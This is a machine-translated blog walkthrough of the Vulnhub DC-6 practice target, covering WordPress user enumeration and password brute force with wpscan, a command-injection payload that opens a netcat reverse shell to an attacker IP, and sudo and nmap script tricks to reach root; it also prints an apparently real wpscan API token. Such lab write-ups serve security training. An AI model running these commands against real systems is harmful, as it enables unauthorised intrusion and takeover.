当前位置:网站首页>Vulnhub's dc6 target
Vulnhub's dc6 target
2022-06-29 07:46:00 【lainwith】
Catalog
Introduce
series : DC( This series consists of 10 platform )
Release date :2019 year 4 month 26 Japan
difficulty : primary - intermediate
Flag: obtain root jurisdiction , And get the only flag
Study :
● wordpress Security testing
● Local code execution
● nmap Raise the right
Target address :https://www.vulnhub.com/entry/dc-6,315/
Prompt information :
- Target support Virtualbox and Vmware
- Need modification hosts file , Such as :192.168.0.142 wordy
- The password book can be obtained in the following ways , Improve test speed :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
information gathering
The host found
arp-scan The host found
arp-scan -I eth0 -l

Host information detection
Information detection :nmap -A -p- 192.168.40.153, Only open 22 and 80 port 
Visit website
The first change hosts file , When I opened it, I saw that it was WordPress Site 
wpscan Test site
- wpscan List the user name of the site 、 account number .
Found some accounts :admin、graham、mark、sarah、jens
wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

- wpscan Missed scanning website , No valuable information was found .
wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

- wpscan Blasting website
Try according to the user name you get , And the dictionary mentioned in the range prompt , Blow up the website , Get the user name :mark, password :helpdesk01
Prepare the password dictionary :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Prepare user name dictionary , It is the one tested 5 Users
Start blasting :
wpscan --url http://wordy -P passwords.txt -U user.txt

Log in to the site
After logging into the website , After a simple search , Found a host ping Test site for . You can try to find out if there are any classic command execution vulnerabilities . At its worst, it can be tested “Activity monitor” Is there any vulnerability in the plug-in .
There are two buttons under the input box , After testing , the last one “Lookup” Button can cause command execution effect 
rebound shell
kali monitor :nc -nvlp 9999
Bounce order :127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
Get interactive shell:python3 -c 'import pty; pty.spawn("/bin/bash")'

information gathering
I saw something on the target plane 4 Users , Go to their home directory first 
Sensitive files found , Identity switch to graham found sudo The possibility of raising rights 
Raise the right
Switch to jens
Ideas : Find out graham It can be used jens Identity execution for
/home/jens/backups.sh, hold/bin/bashAppend to this file , And then use jens When this file is executed as, a file with jens The powers of the shell.
from /home/jens/backups.sh hear :
- Enter the corresponding path first :
cd /home/jens - hold
/bin/bashAppend to this file :echo '/bin/bash' >> backups.sh - Switch identities :
sudo -u jens ./backups.sh
After identity switching , Find that you can continue sudo Raise the right , It's really easy to raise the right 
The right is raised to root
nmap You can execute script files , You can create a file and write to it shell The order of :
echo 'os.execute("/bin/sh")' > rootshell.nse
With root You can use nmap Execute this script :
sudo nmap --script=rootshell.nse

边栏推荐
- Markdown skill tree (6): List
- Markdown skill tree (1): introduction to markdown
- tf. compat. v1.assign
- 面试官:为什么数据库连接很消耗资源,资源都消耗在哪里?
- How to solve the cross domain problem of mobile phone accessing the web in the web development scenario
- Markdown skill tree (4): link
- Golang modifying the value of a structure slice
- Some examples.
- HANA数据库License的查看申请及安装
- Kingbasees coping with transaction rollback caused by too fast growth of table age
猜你喜欢

施努卡:3d视觉检测方案 3d视觉检测应用行业

【工控老马】PLC六路抢答器系统设计详解

【工控老马】西门子PLC s7-300SCL编程详解

KingbaseES V8R6集群维护案例之--单实例数据迁移到集群案例

excel高级绘图技巧100讲(六)-甘特图在项目进度上的实战应用案例

【FreeRTOS】中断机制

Alternative writing of if else in a project

Imx6dl4.1.15 supports EIM bus (Part 2) - configuration principle analysis.

帆船动力学仿真分析

Mmclassification installation and debugging
随机推荐
cv2.cvtColor
Listen to textarea input through Keyup to change button style
tf. count_ nonzero
[translation] swarmed out. Design methods for building modern applications
Detailed explanation of shell condition judgment
Problem solving -- > online OJ (13)
101. symmetric binary tree (recursive and iterative methods)
matlab 多普勒效应产生振动信号和处理
Interviewer: why does database connection consume resources? Where are the resources consumed?
Blue Bridge Cup - minimum frame
软件测试鸾音鹤信
SYSTEMd management node exporter
Markdown skill tree (2): paragraph and emphasis
Markdown skill tree (7): separator and reference
flutter 仿照 uiswitch
What tools do testers need to know
九州云助力内蒙古“东数西算”工程,驱动测绘行业智慧新生态
Fluent imitates uiswitch
Wechat applet learning notes (summer vacation)
tf. compat. v1.assign